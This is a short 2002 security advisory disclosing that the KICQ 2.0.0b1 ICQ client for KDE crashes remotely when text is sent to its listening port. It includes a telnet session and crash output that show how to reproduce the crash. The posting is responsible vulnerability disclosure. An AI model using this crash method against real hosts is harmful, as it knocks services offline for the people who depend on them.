KICQ 2.0.0b1 can be remotely crashed

From: _kiss_at_private
Date: Fri Feb 01 2002 - 14:10:14 PST

    KICQ is an ICQ client, specifically designed for the KDE.

    Versions affected:

        KICQ 2.0.0b1 using icqlib 1.0.0

    Description

    KICQ can be remotely crashed in a very simple way. Just telnet the machine on wich KICQ is running on the port it's bound and feed some garbage.

            bash-2.05$ telnet 10.0.0.1 1030
            Trying 10.0.0.1...
            Connected to 10.0.0.1.
            Escape character is '^]'.
            garbage
            Connection closed by foreign host.

    KDE Crash handler window appears and something like this goes in the console:

       KCrash: crashing.... crashRecursionCounter = 2
       KCrash: Application Name = kicq path = <unknown>

    I have tried to find where in the code the error ocurrs, but the exact place seems to change every time I execute KICQ.

    Solution

    I have contacted the developers and hope a patch is released soon.

    More information: sourceforge.net/projects/kicq

                    Rafael San Miguel Carrasco (_kiss_)
                    rsanmcarat_private